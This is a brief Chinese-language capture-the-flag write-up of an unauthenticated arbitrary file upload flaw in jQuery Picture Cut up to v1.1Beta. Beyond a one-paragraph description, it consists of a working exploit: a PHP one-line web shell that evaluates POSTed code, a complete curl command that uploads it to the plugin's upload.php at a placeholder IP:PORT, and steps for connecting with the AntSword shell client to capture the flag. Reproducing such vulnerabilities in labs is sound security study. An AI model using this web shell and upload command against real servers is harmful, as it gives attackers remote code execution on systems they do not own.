目录

1、漏洞描述

2、访问ip：port

3、一句话木马：exploit.php

4、上传一句话木马

5、中国蚁剑连接成功

6、拿到flag

---

1、漏洞描述

        jQuery是一个快速、简洁的JavaScript框架，是继Prototype之后又一个优秀的JavaScript代码库（框架）于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接：http://www.vapidlabs.com/advisory.php?v=207

2、访问ip：port

3、一句话木马：exploit.php

<?php @eval($_POST['a']);?>

4、上传一句话木马

curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php

5、中国蚁剑连接成功

6、拿到flag